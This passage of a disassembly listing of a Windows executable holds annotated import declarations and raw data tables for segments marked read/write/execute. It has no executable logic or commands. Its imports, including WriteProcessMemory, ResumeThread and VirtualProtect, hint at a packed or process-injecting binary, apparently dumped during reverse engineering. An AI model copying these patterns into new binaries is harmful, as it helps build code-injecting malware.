; DATA XREF: sub_40182F+129�r ...
extrn byte_445EDC:byte:0E8124h ; CODE XREF: sub_40B4BE+22�p
; sub_40C069+27�p
; DATA XREF: ...
;
; Imports from kernel32.dll
;
; void __stdcall InitializeCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn InitializeCriticalSection:dword
; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
extrn GetProcAddress:dword
; HLOCAL __stdcall LocalFree(HLOCAL hMem)
extrn LocalFree:dword
; void __stdcall RaiseException_0(DWORD dwExceptionCode, DWORD dwExceptionFlags, DWORD nNumberOfArguments, const ULONG_PTR *lpArguments)
extrn RaiseException_0:dword
; HLOCAL __stdcall LocalAlloc(UINT uFlags, SIZE_T uBytes)
extrn LocalAlloc:dword
; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
extrn GetModuleHandleA:dword
; void __stdcall LeaveCriticalSection_0(LPCRITICAL_SECTION lpCriticalSection)
extrn LeaveCriticalSection_0:dword
; void __stdcall EnterCriticalSection_0(LPCRITICAL_SECTION lpCriticalSection)
extrn EnterCriticalSection_0:dword
; BOOL __stdcall DuplicateHandle_0(HANDLE hSourceProcessHandle, HANDLE hSourceHandle, HANDLE hTargetProcessHandle, LPHANDLE lpTargetHandle, DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwOptions)
extrn DuplicateHandle_0:dword
; DWORD __stdcall GetShortPathNameA(LPCSTR lpszLongPath, LPSTR lpszShortPath, DWORD cchBuffer)
extrn GetShortPathNameA:dword
; DWORD __stdcall ResumeThread(HANDLE hThread)
extrn ResumeThread:dword
; BOOL __stdcall WriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten)
extrn WriteProcessMemory:dword
; DWORD __stdcall GetPrivateProfileSectionA(LPCSTR lpAppName, LPSTR lpReturnedString, DWORD nSize, LPCSTR lpFileName)
extrn GetPrivateProfileSectionA:dword
; BOOL __stdcall GetStringTypeA_0(LCID Locale, DWORD dwInfoType, LPCSTR lpSrcStr, int cchSrc, LPWORD lpCharType)
extrn GetStringTypeA_0:dword
; int __stdcall LCMapStringW_0(LCID Locale, DWORD dwMapFlags, LPCWSTR lpSrcStr, int cchSrc, LPWSTR lpDestStr, int cchDest)
extrn LCMapStringW_0:dword
; int __stdcall LCMapStringA_0(LCID Locale, DWORD dwMapFlags, LPCSTR lpSrcStr, int cchSrc, LPSTR lpDestStr, int cchDest)
extrn LCMapStringA_0:dword
extrn RtlUnwind_0:dword
; int __stdcall WideCharToMultiByte_0(UINT CodePage, DWORD dwFlags, LPCWSTR lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCSTR lpDefaultChar, LPBOOL lpUsedDefaultChar)
extrn WideCharToMultiByte_0:dword
; int __stdcall MultiByteToWideChar_0(UINT CodePage, DWORD dwFlags, LPCSTR lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar)
extrn MultiByteToWideChar_0:dword
; BOOL __stdcall GetStringTypeW_0(DWORD dwInfoType, LPCWSTR lpSrcStr, int cchSrc, LPWORD lpCharType)
extrn GetStringTypeW_0:dword
;
; Imports from user32.dll
;
; LRESULT __stdcall DefWindowProcA(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
extrn DefWindowProcA:dword
; BOOL __stdcall AdjustWindowRectEx(LPRECT lpRect, DWORD dwStyle, BOOL bMenu, DWORD dwExStyle)
extrn AdjustWindowRectEx:dword
;
; Imports from kernel32.dll
;
; BOOL __stdcall FlushInstructionCache(HANDLE hProcess, LPCVOID lpBaseAddress, SIZE_T dwSize)
extrn FlushInstructionCache:dword
;
; Imports from kernel32.dll
;
; BOOL __stdcall CloseHandle(HANDLE hObject)
extrn CloseHandle:dword
; HANDLE __stdcall CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
extrn CreateFileA:dword
; HANDLE __stdcall CreateFileW(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
extrn CreateFileW:dword
; HANDLE __stdcall CreateFileMappingA(HANDLE hFile, LPSECURITY_ATTRIBUTES lpFileMappingAttributes, DWORD flProtect, DWORD dwMaximumSizeHigh, DWORD dwMaximumSizeLow, LPCSTR lpName)
extrn CreateFileMappingA:dword
; HANDLE __stdcall CreateFileMappingW(HANDLE hFile, LPSECURITY_ATTRIBUTES lpFileMappingAttributes, DWORD flProtect, DWORD dwMaximumSizeHigh, DWORD dwMaximumSizeLow, LPCWSTR lpName)
extrn CreateFileMappingW:dword
; BOOL __stdcall CreateProcessA_0(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation)
extrn CreateProcessA_0:dword
;
; Imports from kernel32.dll
;
; BOOL __stdcall DeleteFileA_0(LPCSTR lpFileName)
extrn DeleteFileA_0:dword
; void __stdcall EnterCriticalSection_1(LPCRITICAL_SECTION lpCriticalSection)
extrn EnterCriticalSection_1:dword
; void __stdcall ExitProcess(UINT uExitCode)
extrn ExitProcess:dword
; BOOL __stdcall FindClose(HANDLE hFindFile)
extrn FindClose:dword
; HANDLE __stdcall FindFirstFileA(LPCSTR lpFileName, LPWIN32_FIND_DATAA lpFindFileData)
extrn FindFirstFileA:dword
; BOOL __stdcall FindNextFileA(HANDLE hFindFile, LPWIN32_FIND_DATAA lpFindFileData)
extrn FindNextFileA:dword
; BOOL __stdcall FlushFileBuffers_0(HANDLE hFile)
extrn FlushFileBuffers_0:dword
; DWORD __stdcall FormatMessageA_0(DWORD dwFlags, LPCVOID lpSource, DWORD dwMessageId, DWORD dwLanguageId, LPSTR lpBuffer, DWORD nSize, va_list *Arguments)
extrn FormatMessageA_0:dword
; BOOL __stdcall FreeLibrary(HMODULE hLibModule)
extrn FreeLibrary:dword
; HANDLE __stdcall GetCurrentProcess_0()
extrn GetCurrentProcess_0:dword
; DWORD __stdcall GetCurrentProcessId_0()
extrn GetCurrentProcessId_0:dword
;
; Imports from kernel32.dll
;
; DWORD __stdcall GetFileAttributesA(LPCSTR lpFileName)
extrn GetFileAttributesA:dword
; DWORD __stdcall GetFileAttributesW(LPCWSTR lpFileName)
extrn GetFileAttributesW:dword
; BOOL __stdcall GetFileInformationByHandle(HANDLE hFile, LPBY_HANDLE_FILE_INFORMATION lpFileInformation)
extrn GetFileInformationByHandle:dword
; DWORD __stdcall GetFileSize(HANDLE hFile, LPDWORD lpFileSizeHigh)
extrn GetFileSize:dword
; BOOL __stdcall GetFileTime_0(HANDLE hFile, LPFILETIME lpCreationTime, LPFILETIME lpLastAccessTime, LPFILETIME lpLastWriteTime)
extrn GetFileTime_0:dword
; DWORD __stdcall GetFullPathNameA(LPCSTR lpFileName, DWORD nBufferLength, LPSTR lpBuffer, LPSTR *lpFilePart)
extrn GetFullPathNameA:dword
; DWORD __stdcall GetFullPathNameW(LPCWSTR lpFileName, DWORD nBufferLength, LPWSTR lpBuffer, LPWSTR *lpFilePart)
extrn GetFullPathNameW:dword
; DWORD __stdcall GetLastError_0()
extrn GetLastError_0:dword
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule, LPCH lpFilename, DWORD nSize)
extrn GetModuleFileNameA:dword
; HMODULE __stdcall GetModuleHandleA_0(LPCSTR lpModuleName)
extrn GetModuleHandleA_0:dword
; UINT __stdcall GetPrivateProfileIntA(LPCSTR lpAppName, LPCSTR lpKeyName, INT nDefault, LPCSTR lpFileName)
extrn GetPrivateProfileIntA:dword
; DWORD __stdcall GetPrivateProfileSectionNamesA(LPSTR lpszReturnBuffer, DWORD nSize, LPCSTR lpFileName)
extrn GetPrivateProfileSectionNamesA:dword
; DWORD __stdcall GetPrivateProfileStringA(LPCSTR lpAppName, LPCSTR lpKeyName, LPCSTR lpDefault, LPSTR lpReturnedString, DWORD nSize, LPCSTR lpFileName)
extrn GetPrivateProfileStringA:dword
; FARPROC __stdcall GetProcAddress_0(HMODULE hModule, LPCSTR lpProcName)
extrn GetProcAddress_0:dword
; void __stdcall GetSystemTimeAsFileTime(LPFILETIME lpSystemTimeAsFileTime)
extrn GetSystemTimeAsFileTime:dword
; UINT __stdcall GetTempFileNameA(LPCSTR lpPathName, LPCSTR lpPrefixString, UINT uUnique, LPSTR lpTempFileName)
extrn GetTempFileNameA:dword
; DWORD __stdcall GetTempPathA_0(DWORD nBufferLength, LPSTR lpBuffer)
extrn GetTempPathA_0:dword
; BOOL __stdcall GetVersionExA_0(LPOSVERSIONINFOA lpVersionInformation)
extrn GetVersionExA_0:dword
; DWORD __stdcall GetTickCount_0()
extrn GetTickCount_0:dword
; LPVOID __stdcall HeapAlloc_0(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes)
extrn HeapAlloc_0:dword
; BOOL __stdcall HeapFree_0(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem)
extrn HeapFree_0:dword
; HANDLE __stdcall HeapCreate_0(DWORD flOptions, SIZE_T dwInitialSize, SIZE_T dwMaximumSize)
extrn HeapCreate_0:dword
; void __stdcall InitializeCriticalSection_0(LPCRITICAL_SECTION lpCriticalSection)
extrn InitializeCriticalSection_0:dword
; void __stdcall DeleteCriticalSection_0(LPCRITICAL_SECTION lpCriticalSection)
extrn DeleteCriticalSection_0:dword
; void __stdcall LeaveCriticalSection_1(LPCRITICAL_SECTION lpCriticalSection)
extrn LeaveCriticalSection_1:dword
; HMODULE __stdcall LoadLibraryExA(LPCSTR lpLibFileName, HANDLE hFile, DWORD dwFlags)
extrn LoadLibraryExA:dword
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword
;
; Imports from kernel32.dll
;
; HLOCAL __stdcall LocalFree_0(HLOCAL hMem)
extrn LocalFree_0:dword
; BOOL __stdcall LockFile(HANDLE hFile, DWORD dwFileOffsetLow, DWORD dwFileOffsetHigh, DWORD nNumberOfBytesToLockLow, DWORD nNumberOfBytesToLockHigh)
extrn LockFile:dword
; LPVOID __stdcall MapViewOfFile(HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow, SIZE_T dwNumberOfBytesToMap)
extrn MapViewOfFile:dword
; int __stdcall MultiByteToWideChar_1(UINT CodePage, DWORD dwFlags, LPCSTR lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar)
extrn MultiByteToWideChar_1:dword
;
; Imports from kernel32.dll
;
; void __stdcall RaiseException_1(DWORD dwExceptionCode, DWORD dwExceptionFlags, DWORD nNumberOfArguments, const ULONG_PTR *lpArguments)
extrn RaiseException_1:dword
; BOOL __stdcall ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped)
extrn ReadFile:dword
;
; Imports from kernel32.dll
;
; BOOL __stdcall SetEvent(HANDLE hEvent)
extrn SetEvent:dword
; DWORD __stdcall SetFilePointer(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod)
extrn SetFilePointer:dword
; void __stdcall SetLastError(DWORD dwErrCode)
extrn SetLastError:dword
; LPTOP_LEVEL_EXCEPTION_FILTER __stdcall SetUnhandledExceptionFilter(LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter)
extrn SetUnhandledExceptionFilter:dword
; void __stdcall Sleep_0(DWORD dwMilliseconds)
extrn Sleep_0:dword
; BOOL __stdcall TerminateProcess_0(HANDLE hProcess, UINT uExitCode)
extrn TerminateProcess_0:dword
; BOOL __stdcall UnlockFile(HANDLE hFile, DWORD dwFileOffsetLow, DWORD dwFileOffsetHigh, DWORD nNumberOfBytesToUnlockLow, DWORD nNumberOfBytesToUnlockHigh)
extrn UnlockFile:dword
; BOOL __stdcall UnmapViewOfFile(LPCVOID lpBaseAddress)
extrn UnmapViewOfFile:dword
; LPVOID __stdcall VirtualAlloc_0(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
extrn VirtualAlloc_0:dword
; BOOL __stdcall VirtualFree_0(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType)
extrn VirtualFree_0:dword
; BOOL __stdcall VirtualProtect(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect)
extrn VirtualProtect:dword
; SIZE_T __stdcall VirtualQuery(LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength)
extrn VirtualQuery:dword
;
; Imports from kernel32.dll
;
; int __stdcall WideCharToMultiByte_1(UINT CodePage, DWORD dwFlags, LPCWSTR lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCSTR lpDefaultChar, LPBOOL lpUsedDefaultChar)
extrn WideCharToMultiByte_1:dword
; BOOL __stdcall WriteFile_0(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped)
extrn WriteFile_0:dword
extrn lstrcmpi_0:dword
;
; Imports from user32.dll
;
; LONG __stdcall ChangeDisplaySettingsA(LPDEVMODEA lpDevMode, DWORD dwFlags)
extrn ChangeDisplaySettingsA:dword
; DWORD __stdcall CharUpperBuffA(LPSTR lpsz, DWORD cchLength)
extrn CharUpperBuffA:dword
; HANDLE __stdcall LoadImageA(HINSTANCE hInst, LPCSTR name, UINT type, int cx, int cy, UINT fuLoad)
extrn LoadImageA:dword
; int __stdcall MessageBoxA(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType)
extrn MessageBoxA:dword
; int wsprintfA(LPSTR, LPCSTR, ...)
extrn wsprintfA:dword
; int __stdcall wvsprintfA(LPSTR, LPCSTR, va_list arglist)
extrn wvsprintfA:dword
;
; Imports from gdi32.dll
;
; int __stdcall AddFontResourceA(LPCSTR)
extrn AddFontResourceA:dword
; HDC __stdcall CreateCompatibleDC_0(HDC hdc)
extrn CreateCompatibleDC_0:dword
; HBITMAP __stdcall CreateDIBSection_0(HDC hdc, const BITMAPINFO *lpbmi, UINT usage, void **ppvBits, HANDLE hSection, DWORD offset)
extrn CreateDIBSection_0:dword
; BOOL __stdcall DeleteDC_0(HDC hdc)
extrn DeleteDC_0:dword
; BOOL __stdcall RemoveFontResourceA(LPCSTR lpFileName)
extrn RemoveFontResourceA:dword
;
; Imports from user32.dll
;
; HDC __stdcall BeginPaint(HWND hWnd, LPPAINTSTRUCT lpPaint)
extrn BeginPaint:dword
; BOOL __stdcall EndPaint(HWND hWnd, const PAINTSTRUCT *lpPaint)
extrn EndPaint:dword
;
; Imports from gdi32.dll
;
; int __stdcall GetObjectA(HANDLE h, int c, LPVOID pv)
extrn GetObjectA:dword
; HGDIOBJ __stdcall SelectObject_0(HDC hdc, HGDIOBJ h)
extrn SelectObject_0:dword
; BOOL __stdcall DeleteObject_0(HGDIOBJ ho)
extrn DeleteObject_0:dword
; BOOL __stdcall BitBlt_0(HDC hdc, int x, int y, int cx, int cy, HDC hdcSrc, int x1, int y1, DWORD rop)
extrn BitBlt_0:dword
;
; Imports from user32.dll
;
; DWORD __stdcall GetWindowThreadProcessId(HWND hWnd, LPDWORD lpdwProcessId)
extrn GetWindowThreadProcessId:dword
; HWND __stdcall SetActiveWindow(HWND hWnd)
extrn SetActiveWindow:dword
; BOOL __stdcall SetForegroundWindow(HWND hWnd)
extrn SetForegroundWindow:dword
; ATOM __stdcall RegisterClassExA(const WNDCLASSEXA *)
extrn RegisterClassExA:dword
; int __stdcall GetSystemMetrics(int nIndex)
extrn GetSystemMetrics:dword
; HWND __stdcall CreateWindowExA(DWORD dwExStyle, LPCSTR lpClassName, LPCSTR lpWindowName, DWORD dwStyle, int X, int Y, int nWidth, int nHeight, HWND hWndParent, HMENU hMenu, HINSTANCE hInstance, LPVOID lpParam)
extrn CreateWindowExA:dword
; BOOL __stdcall GetMessageA(LPMSG lpMsg, HWND hWnd, UINT wMsgFilterMin, UINT wMsgFilterMax)
extrn GetMessageA:dword
; BOOL __stdcall TranslateMessage(const MSG *lpMsg)
extrn TranslateMessage:dword
; LRESULT __stdcall DispatchMessageA(const MSG *lpMsg)
extrn DispatchMessageA:dword
; BOOL __stdcall DestroyWindow_0(HWND hWnd)
extrn DestroyWindow_0:dword
; BOOL __stdcall EnumWindows(WNDENUMPROC lpEnumFunc, LPARAM lParam)
extrn EnumWindows:dword
;
; Imports from user32.dll
;
; BOOL __stdcall PostMessageA(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
extrn PostMessageA:dword
;
; Imports from kernel32.dll
;
; HANDLE __stdcall CreateThread_0(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId)
extrn CreateThread_0:dword
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 531840h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
dd 22h dup(0)
dd 7C97C8C0h, 0FFFFFFFFh, 4 dup(0)
dd 9E0538h, 9E00A8h, 9E02F0h, 9E0780h, 2 dup(0)
dd 9A0048h, 9B0090h, 9C0098h, 9D00A0h, 962518h, 963140h
dd 4000E8h, 7 dup(0)
dd 7C97C800h, 0FFFFFFFFh, 5 dup(0)
dd 9623B8h, 962478h, 962418h, 34h dup(0)
dd 7C97C7E0h, 0FFFFFFFFh, 5 dup(0)
dd 960000h, 1194h dup(0)
dd 7C97C980h, 0FFFFFFFFh, 6 dup(0)
dd 7C97C960h, 0FFFFFFFFh, 5 dup(0)
dd 962110h, 962358h, 49h dup(0)
dd 380h dup(?)
_text ends
; Section 2. (virtual address 00137000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00135600
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_idata segment para public 'CODE' use32
assume cs:_idata
;org 537000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
dd 13799Ch, 2 dup(0)
dd 1380ECh, 24000h, 1379C4h, 2 dup(0)
dd 13819Ah, 24028h, 137A14h, 2 dup(0)
dd 138310h, 2407Ch, 137A20h, 2 dup(0)
dd 13833Eh, 2408Ch, 137A34h, 2 dup(0)
db 90h
db 83h, 13h, 0
dd 240A8h, 137A40h, 2 dup(0)
dd 1383D0h, 240BCh, 137A54h, 2 dup(0)
dd 13844Eh, 240D0h, 137A5Ch, 2 dup(0)
dd 138476h, 240DCh, 137A7Ch, 2 dup(0)
dd 1384F2h, 240FCh, 137A8Ch, 2 dup(0)
dd 138530h, 24114h, 137ACCh, 2 dup(0)
dd 138652h, 24154h, 137B44h, 2 dup(0)
dd 138850h, 241CCh, 137B54h, 2 dup(0)
dd 13889Eh, 241DCh, 137BA0h, 2 dup(0)
dd 138972h, 45CECh, 137BA8h, 2 dup(0)
dd 138988h, 45CF0h, 137BB0h, 2 dup(0)
dd 1389A6h, 45CF4h, 137BB8h, 2 dup(0)
dd 1389D0h, 45CF8h, 137BC4h, 2 dup(0)
dd 1389FAh, 45D00h, 137BCCh, 2 dup(0)
dd 138A14h, 45D04h, 137BD4h, 2 dup(0)
dd 138A2Eh, 45D08h, 137BDCh, 2 dup(0)
dd 138A4Ah, 45D0Ch, 137BF0h, 2 dup(0)
dd 138AA4h, 45D1Ch, 137BF8h, 2 dup(0)
dd 138AC0h, 45D20h, 137C00h, 2 dup(0)
dd 138AE4h, 45D24h, 137C08h, 2 dup(0)
dd 138B00h, 45D28h, 137C10h, 2 dup(0)
dd 138B24h, 45D2Ch, 137C18h, 2 dup(0)
dd 138B44h, 45D30h, 137C20h, 2 dup(0)
dd 138B66h, 45D34h, 137C28h, 2 dup(0)
dd 138B86h, 45D3Ch, 137C30h, 2 dup(0)
dd 138BA6h, 45D40h, 137C38h, 2 dup(0)
dd 138BC4h, 45D44h, 137C40h, 2 dup(0)
dd 138BE2h, 45D48h, 137C48h, 2 dup(0)
dd 138C00h, 45D4Ch, 137C50h, 2 dup(0)
dd 138C24h, 45D54h, 137C58h, 2 dup(0)
dd 138C42h, 45D58h, 137C60h, 2 dup(0)
dd 138C56h, 45D60h, 137C68h, 2 dup(0)
dd 138C6Ah, 45D64h, 137C70h, 2 dup(0)
dd 138C8Ch, 45D68h, 137C78h, 2 dup(0)
dd 138CB4h, 45D6Ch, 137C80h, 2 dup(0)
dd 138CD0h, 45D70h, 137C88h, 2 dup(0)
dd 138CEEh, 45D74h, 137C94h, 2 dup(0)
dd 138D1Eh, 45D7Ch, 137C9Ch, 2 dup(0)
dd 138D46h, 45D84h, 137CA4h, 2 dup(0)
dd 138D60h, 45D88h, 137CACh, 2 dup(0)
dd 138D7Ah, 45D8Ch, 137CB4h, 2 dup(0)
dd 138D96h, 45D90h, 137CBCh, 2 dup(0)
dd 138DB6h, 45D94h, 137CC4h, 2 dup(0)
dd 138DDEh, 45D98h, 137CCCh, 2 dup(0)
dd 138DFAh, 45D9Ch, 137CD4h, 2 dup(0)
dd 138E14h, 45DA0h, 137CDCh, 2 dup(0)
dd 138E34h, 45DA8h, 137CE4h, 2 dup(0)
dd 138E52h, 45DACh, 137CECh, 2 dup(0)
dd 138E74h, 45DB0h, 137CF4h, 2 dup(0)
dd 138E94h, 45DB8h, 137CFCh, 2 dup(0)
dd 138EB2h, 45DBCh, 137D04h, 2 dup(0)
dd 138ECEh, 45DC0h, 137D10h, 2 dup(0)
dd 138EF8h, 45DC8h, 137D20h, 2 dup(0)
dd 138F28h, 45DD8h, 137D28h, 2 dup(0)
dd 138F48h, 45DDCh, 137D30h, 2 dup(0)
dd 138F64h, 45DE0h, 137D3Ch, 2 dup(0)
dd 138FA0h, 45DE8h, 137D44h, 2 dup(0)
dd 138FBCh, 45DECh, 137D4Ch, 2 dup(0)
dd 138FDCh, 45DF0h, 137D58h, 2 dup(0)
dd 13900Ch, 45DF8h, 137D60h, 2 dup(0)
dd 13902Ch, 45DFCh, 137D68h, 2 dup(0)
dd 139044h, 45E00h, 137D70h, 2 dup(0)
dd 139060h, 45E04h, 137D78h, 2 dup(0)
dd 13907Ah, 45E08h, 137D80h, 2 dup(0)
dd 13909Ch, 45E0Ch, 137D88h, 2 dup(0)
dd 1390B2h, 45E10h, 137D90h, 2 dup(0)
dd 1390C8h, 45E14h, 137D98h, 2 dup(0)
dd 1390E8h, 45E18h, 137DA0h, 2 dup(0)
dd 139108h, 45E20h, 137DACh, 2 dup(0)
dd 139124h, 45E28h, 137DB4h, 2 dup(0)
dd 139144h, 45E2Ch, 137DBCh, 2 dup(0)
dd 13915Eh, 45E30h, 137DC4h, 2 dup(0)
dd 139178h, 45E34h, 137DCCh, 2 dup(0)
dd 13919Eh, 45E38h, 137DD8h, 2 dup(0)
dd 1391C0h, 45E40h, 137DE0h, 2 dup(0)
dd 1391DCh, 45E44h, 137DE8h, 2 dup(0)
dd 139206h, 45E48h, 137DF0h, 2 dup(0)
dd 139226h, 45E4Ch, 137DFCh, 2 dup(0)
dd 139244h, 45E54h, 137E04h, 2 dup(0)
dd 13926Eh, 45E58h, 137E0Ch, 2 dup(0)
db 90h
db 92h, 13h, 0
dd 45E60h, 137E14h, 2 dup(0)
dd 1392B0h, 45E64h, 137E1Ch, 2 dup(0)
dd 1392C8h, 45E68h, 137E2Ch, 2 dup(0)
dd 139306h, 45E74h, 137E34h, 2 dup(0)
dd 13931Ah, 45E78h, 137E3Ch, 2 dup(0)
dd 139338h, 45E7Ch, 137E44h, 2 dup(0)
dd 139358h, 45E80h, 137E4Ch, 2 dup(0)
dd 139374h, 45E84h, 137E54h, 2 dup(0)
dd 139392h, 45E88h, 137E5Ch, 2 dup(0)
dd 1393A8h, 45E90h, 137E68h, 2 dup(0)
dd 1393DEh, 45E9Ch, 137E74h, 2 dup(0)
dd 139410h, 45EA4h, 137E80h, 2 dup(0)
dd 139436h, 45EACh, 137E88h, 2 dup(0)
dd 139452h, 45EB0h, 137E90h, 2 dup(0)
dd 13946Ah, 45EB4h, 137E98h, 2 dup(0)
dd 13948Ch, 45EB8h, 137EA8h, 2 dup(0)
dd 1394BEh, 45EC4h, 137EB0h, 2 dup(0)
dd 1394DCh, 45EC8h, 137EB8h, 2 dup(0)
dd 1394F6h, 45ED0h, 137EC0h, 2 dup(0)
dd 139514h, 45ED4h, 137EC8h, 2 dup(0)
dd 139530h, 45ED8h, 137ED0h, 2 dup(0)
dd 139550h, 12E000h, 137F24h, 2 dup(0)
dd 1396E0h, 12E054h, 137F30h, 2 dup(0)
dd 139714h, 131670h, 137F38h, 2 dup(0)
dd 13973Ah, 1316A4h, 137F54h, 2 dup(0)
dd 1397B0h, 1316C0h, 137F84h, 2 dup(0)
dd 13987Eh, 1316F4h, 137FF4h, 2 dup(0)
dd 139AAEh, 131764h, 138008h, 2 dup(0)
dd 139AFAh, 131778h, 138014h, 2 dup(0)
dd 139B26h, 131784h, 138048h, 2 dup(0)
dd 139BFCh, 1317B8h, 138058h, 2 dup(0)
dd 139C38h, 1317C4h, 138074h, 2 dup(0)
dd 139CA6h, 1317DCh, 13808Ch, 2 dup(0)
dd 139D10h, 1317F0h, 138098h, 2 dup(0)
dd 139D36h, 1317F8h, 1380ACh, 2 dup(0)
dd 139D78h, 131808h, 1380DCh, 2 dup(0)
dd 139E56h, 131838h, 1380E4h, 2 dup(0)
dd 139E72h, 13183Ch, 5 dup(0)
dd 1380FAh, 138108h, 138122h, 138134h, 138146h, 138156h
dd 13816Ah, 13817Ah, 13818Ah, 0
dd 1381A8h, 1381BAh, 1381CCh, 1381E6h, 1381FEh, 138218h
dd 138232h, 13824Eh, 13825Ah, 138264h, 138270h, 138280h
dd 138290h, 13829Eh, 1382ACh, 1382BCh, 1382D6h, 1382F2h
dd 1382FAh, 0
dd 13831Eh, 13832Ah, 0
dd 13834Ch, 13835Eh, 138370h, 138380h, 0
dd 13839Eh, 1383B6h, 0
dd 1383DEh, 1383F6h, 13840Eh, 138436h, 0
dd 13845Ch, 0
dd 138484h, 138490h, 13849Ch, 1384AEh, 1384C0h, 1384D4h
dd 1384E4h, 0
dd 138500h, 138512h, 138522h, 0
dd 13853Eh, 13854Ch, 13855Eh, 13857Ah, 138590h, 1385A0h
dd 1385B0h, 1385BCh, 1385D2h, 1385E2h, 1385F4h, 138608h
dd 138616h, 13862Ch, 138642h, 0
dd 138660h, 138676h, 13868Ah, 138698h, 1386AEh, 1386C4h
dd 1386D4h, 1386E6h, 1386F2h, 138706h, 138712h, 138724h
dd 138738h, 138744h, 13875Eh, 13876Eh, 13877Ch, 13878Eh
dd 1387A0h, 1387AEh, 1387C8h, 1387D6h, 1387E4h, 1387F2h
dd 138802h, 138812h, 138824h, 138830h, 138840h, 0
dd 13885Ch, 138876h, 13888Ch, 0
dd 1388AAh, 1388B8h, 1388C6h, 1388D4h, 1388DCh, 1388E6h
dd 1388F0h, 1388FCh, 138904h, 13890Ch, 138914h, 13891Eh
dd 13892Eh, 138936h, 138942h, 13894Ch, 13895Ah, 138964h
dd 0
dd 13897Ch, 0
dd 138996h, 0
dd 1389B2h, 0
dd 1389DEh, 1389ECh, 0
dd 138A04h, 0
dd 138A20h, 0
dd 138A3Ch, 0
dd 138A58h, 138A68h, 138A78h, 138A88h, 0
dd 138AB0h, 0
dd 138ACEh, 0
dd 138AF2h, 0
dd 138B0Eh, 0
dd 138B30h, 0
dd 138B52h, 0
dd 138B72h, 0
dd 138B92h, 0
dd 138BB2h, 0
dd 138BD2h, 0
dd 138BF0h, 0
dd 138C0Ch, 0
dd 138C2Eh, 0
dd 138C4Eh, 0
dd 138C62h, 0
dd 138C72h, 0
dd 138C98h, 0
dd 138CC0h, 0
dd 138CDEh, 0
dd 138CFCh, 138D0Eh, 0
dd 138D2Ch, 0
dd 138D52h, 0
dd 138D6Ah, 0
dd 138D88h, 0
dd 138DA4h, 0
dd 138DC4h, 0
dd 138DEAh, 0
dd 138E06h, 0
dd 138E20h, 0
dd 138E40h, 0
dd 138E5Eh, 0
dd 138E82h, 0
dd 138EA0h, 0
dd 138EBEh, 0
dd 138EDAh, 138EECh, 0
dd 138F04h, 138F12h, 138F1Ch, 0
dd 138F36h, 0
dd 138F54h, 0
dd 138F72h, 138F8Ah, 0
dd 138FACh, 0
dd 138FC8h, 0
dd 138FE8h, 138FFCh, 0
dd 139018h, 0
dd 139038h, 0
dd 139052h, 0
dd 13906Ch, 0
dd 139088h, 0
dd 1390A8h, 0
dd 1390BCh, 0
dd 1390D4h, 0
dd 1390F6h, 0
dd 139114h, 13911Ch, 0
dd 139132h, 0
dd 13914Eh, 0
dd 13916Ah, 0
dd 139186h, 0
dd 1391AAh, 1391B8h, 0
db 0CCh
db 91h, 13h, 0
align 10h
dd 1391EAh, 0
dd 139214h, 0
dd 139232h, 13923Ch, 0
dd 139252h, 0
dd 13927Ah, 0
dd 13929Ch, 0
dd 1392BCh, 0
